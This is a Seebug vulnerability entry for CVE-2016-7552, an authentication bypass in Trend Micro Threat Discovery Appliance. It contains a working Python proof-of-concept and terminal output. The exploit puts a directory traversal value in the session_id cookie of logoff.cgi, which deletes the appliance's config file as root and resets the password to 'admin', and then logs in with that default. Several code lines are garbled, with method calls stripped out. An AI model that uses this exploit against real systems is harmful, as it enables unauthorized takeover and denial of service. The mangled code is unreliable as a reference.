Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability(CVE-2016-7552)

ID SSV:92981
Type seebug
Reporter Root
Modified 2017-04-21T00:00:00



There exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. This can result in an attacker causing a DoS or bypassing authentication.


An attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'. 1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf 2. Wait for the server to be rebooted... It is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby no-body can even login... (since the md5 hashed pw is stored in the config file). Notes: ====== - (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience) - No username required!


saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./ (+) usage: ./ <target> <option [reset][login]> (+) eg: ./ reset (+) eg: ./ login saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./ login (-) login failed saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./ reset (+) resetting the default password... (+) success! now wait for a reboot... saturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./ login (+) logged in... (+) authenticated session_id: de685c4feec6d698f8165a8af8489df1

                                                import re
import os
import sys
import time
import requests
import threading


if len(sys.argv) != 3:
    print "(+) usage: %s <target> <option [reset][login]>" % sys.argv[0]
    print "(+) eg: %s reset" % sys.argv[0]
    print "(+) eg: %s login" % sys.argv[0]

t = sys.argv[1]
o = sys.argv[2]

bu = "https://%s/" % t
l_url = "%scgi-bin/logon.cgi" % bu
o_url = "%scgi-bin/logoff.cgi" % bu

if o.lower() == "login":
    # default password
    r =, data={ "passwd":"admin", "isCookieEnable":1 }, verify=False)
    if "frame.cgi" in r.text:
        print "(+) logged in..."
        match ="session_id=(.*); path", r.headers['set-cookie'])
        if match:
            print "(+) authenticated session_id: %s" %
        print "(-) login failed"
elif o.lower() == "reset":
    print "(+) resetting the default password..."
    r = requests.get(o_url, cookies={"session_id":"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"}, verify=False)
    # causes an uninitialized free() vulnerability as well...
    if "Memory map" in r.text:
        print "(+) success! now wait for a reboot..."
    print "(-) not a valid option!"